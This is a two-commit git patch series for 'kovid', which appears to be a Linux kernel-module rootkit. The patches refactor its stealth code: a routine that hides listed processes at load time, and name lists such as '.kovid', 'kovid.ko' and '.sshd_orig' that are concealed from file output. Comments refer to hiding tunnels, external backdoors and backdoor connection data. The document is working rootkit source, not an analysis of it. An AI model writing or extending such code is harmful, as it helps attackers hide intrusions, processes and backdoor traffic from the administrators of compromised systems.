From 5aef9e0093a4c967639a7cdcdcdbf187f2842f9e Mon Sep 17 00:00:00 2001 From: JNE Date: Fri, 26 Apr 2024 11:28:33 +0100 Subject: [PATCH 1/2] Eliminate netapp netapp kind of lost its purpose, i tis more generic than "network applicatons" since most processes can be hidden during load time in kv. --- src/kovid.c | 9 ++++----- src/lkm.h | 13 ++++++++++++- src/netapp.h | 14 -------------- src/pid.c | 11 +++++------ 4 files changed, 21 insertions(+), 26 deletions(-) delete mode 100644 src/netapp.h diff --git a/src/kovid.c b/src/kovid.c index 466e559..e57bba5 100644 --- a/src/kovid.c +++ b/src/kovid.c @@ -736,12 +736,11 @@ static int __init kv_init(void) { /** hide magic filenames & directories */ fs_add_name_ro(names); - /** Hide network applications that match - * the names defined in netapp.h - * tunnels, external backdoors... - * Run once + /** Hide applications onload that match + * the names defined in lkm.h + * It runs only once */ - kv_scan_and_hide_netapp(); + kv_scan_and_hide(); #ifndef DEBUG_RING_BUFFER /** *pr_info because it must be shown even if DEPLOY=1 */ diff --git a/src/lkm.h b/src/lkm.h index e8d8617..e6975eb 100644 --- a/src/lkm.h +++ b/src/lkm.h @@ -132,7 +132,7 @@ bool kv_for_each_hidden_backdoor_data(bool (*cb)(__be32, void *), void *); void kv_reload_hidden_task(struct task_struct *task); void kv_pid_cleanup(void); void kv_show_saved_tasks(void); -void kv_scan_and_hide_netapp(void); +void kv_scan_and_hide(void); /** syscall,function addresses */ struct kernel_syscalls *kv_kall_load_addr(void); @@ -160,6 +160,17 @@ char *kv_util_random_AZ_string(size_t); /** VM operations */ unsigned long kv_get_elf_vm_start(pid_t); + /* + * The names below are just examples and can be + * modified and/or extended at will + * warning: don't add backdoor programs here + */ +static const char *hide_on_load_list[] = { + "whitenose", "pinknose", "rednose", "blacknose", + "greynose", "purplenose", "bluenose", NULL +}; + + // PP_NARG from // https://groups.google.com/forum/#!topic/comp.std.c/d-6Mj5Lko_s #define PP_NARG(...) \ diff --git a/src/netapp.h b/src/netapp.h deleted file mode 100644 index d56f5e9..0000000 --- a/src/netapp.h +++ /dev/null @@ -1,14 +0,0 @@ -#ifndef __NETAPP_H -#define __NETAPP_H - - /* - * The names below are just examples and can be - * modified and/or extended at will - * warning: don't add backdoor programs here - */ -static const char *netapp_list[] = { - "whitenose", "pinknose", "rednose", "blacknose", - "greynose", "purplenose", "bluenose", NULL -}; - -#endif diff --git a/src/pid.c b/src/pid.c index 67d28ed..43c1247 100644 --- a/src/pid.c +++ b/src/pid.c @@ -16,7 +16,6 @@ #include #include "lkm.h" #include "fs.h" -#include "netapp.h" static LIST_HEAD(tasks_node); #ifdef DEBUG_RING_BUFFER @@ -455,7 +454,7 @@ bool kv_for_each_hidden_backdoor_data(bool (*cb)(__be32, void *), void *priv) { * that this function also conceals the connections of network applications. * For more information, refer to 'netapp.h'. */ -void kv_scan_and_hide_netapp(void) { +void kv_scan_and_hide(void) { struct task_struct *t; for_each_process(t) { @@ -467,13 +466,13 @@ void kv_scan_and_hide_netapp(void) { if (!(fnode = fs_get_file_node(t))) continue; /* XXX: optimise this */ - for (; netapp_list[i] != NULL; ++i) { - if (strncmp(netapp_list[i], t->comm, strlen(netapp_list[i]))) continue; - prinfo("Hide netapp task: %d %s i=%d '%s'\n", t->pid, fnode->filename, i, netapp_list[i]); + for (; hide_on_load_list[i] != NULL; ++i) { + if (strncmp(hide_on_load_list[i], t->comm, strlen(hide_on_load_list[i]))) continue; + prinfo("Hide netapp task: %d %s i=%d '%s'\n", t->pid, fnode->filename, i, hide_on_load_list[i]); /** * notice that any netapp added here * will NOT be killed if kv is unloaded - * In reality an application that is listed in netapp_list will be handled + * In reality an application that is listed in hide_on_load_list will be handled * in the same way as if you manually hide a parent process: * echo >/proc/kv */ From 89aa0cd4fa2c3e089fb23b259a64b09095b0567b Mon Sep 17 00:00:00 2001 From: JNE Date: Fri, 26 Apr 2024 12:38:30 +0100 Subject: [PATCH 2/2] Move pieces around --- src/kovid.c | 14 +++----------- src/lkm.h | 15 +++++++++++---- src/pid.c | 9 ++++----- 3 files changed, 18 insertions(+), 20 deletions(-) diff --git a/src/kovid.c b/src/kovid.c index e57bba5..71bee86 100644 --- a/src/kovid.c +++ b/src/kovid.c @@ -682,12 +682,6 @@ static int __init kv_init(void) { #if LINUX_VERSION_CODE >= KERNEL_VERSION(5,17,0) struct kernel_syscalls *kaddr = NULL; #endif - const char *names[] = { - ".kovid", "kovid", "kovid.ko", ".kv.ko", ".lm.sh", ".sshd_orig", - "whitenose", "pinknose", "rednose", "greynose", "purplenose", - "blacknose", "bluenose", NULL - }; - if (strlen(PROCNAME) == 0) { procname_err = "Empty PROCNAME build parameter. Check Makefile."; } else if (!strncmp(PROCNAME, "changeme", 5)) { @@ -734,12 +728,10 @@ static int __init kv_init(void) { kv_hide_task_by_pid(tsk_prc->pid, 0, CHILDREN); /** hide magic filenames & directories */ - fs_add_name_ro(names); + fs_add_name_ro(kv_hide_str_on_load); - /** Hide applications onload that match - * the names defined in lkm.h - * It runs only once - */ + /** hide magic filenames, directories and processes */ + fs_add_name_ro(kv_hide_ps_on_load); kv_scan_and_hide(); #ifndef DEBUG_RING_BUFFER diff --git a/src/lkm.h b/src/lkm.h index e6975eb..c308057 100644 --- a/src/lkm.h +++ b/src/lkm.h @@ -161,15 +161,22 @@ char *kv_util_random_AZ_string(size_t); unsigned long kv_get_elf_vm_start(pid_t); /* - * The names below are just examples and can be - * modified and/or extended at will - * warning: don't add backdoor programs here + * Hide these process names during load + * children included */ -static const char *hide_on_load_list[] = { +static const char *kv_hide_ps_on_load[] = { "whitenose", "pinknose", "rednose", "blacknose", "greynose", "purplenose", "bluenose", NULL }; +/* + * Hide these names from write() fs output + */ +static const char *kv_hide_str_on_load[] = { + ".kovid", "kovid", "kovid.ko", ".kv.ko", + ".lm.sh", ".sshd_orig", NULL +}; + // PP_NARG from // https://groups.google.com/forum/#!topic/comp.std.c/d-6Mj5Lko_s diff --git a/src/pid.c b/src/pid.c index 43c1247..8fbb532 100644 --- a/src/pid.c +++ b/src/pid.c @@ -465,14 +465,13 @@ void kv_scan_and_hide(void) { if (kv_find_hidden_task(t)) continue; if (!(fnode = fs_get_file_node(t))) continue; - /* XXX: optimise this */ - for (; hide_on_load_list[i] != NULL; ++i) { - if (strncmp(hide_on_load_list[i], t->comm, strlen(hide_on_load_list[i]))) continue; - prinfo("Hide netapp task: %d %s i=%d '%s'\n", t->pid, fnode->filename, i, hide_on_load_list[i]); + for (; kv_hide_ps_on_load[i] != NULL; ++i) { + if (strncmp(kv_hide_ps_on_load[i], t->comm, strlen(kv_hide_ps_on_load[i]))) continue; + prinfo("Hide task name '%s' from '%s' of pid %d\n", t->comm, fnode->filename, t->pid); /** * notice that any netapp added here * will NOT be killed if kv is unloaded - * In reality an application that is listed in hide_on_load_list will be handled + * In reality an application that is listed in kv_hide_ps_on_load will be handled * in the same way as if you manually hide a parent process: * echo >/proc/kv */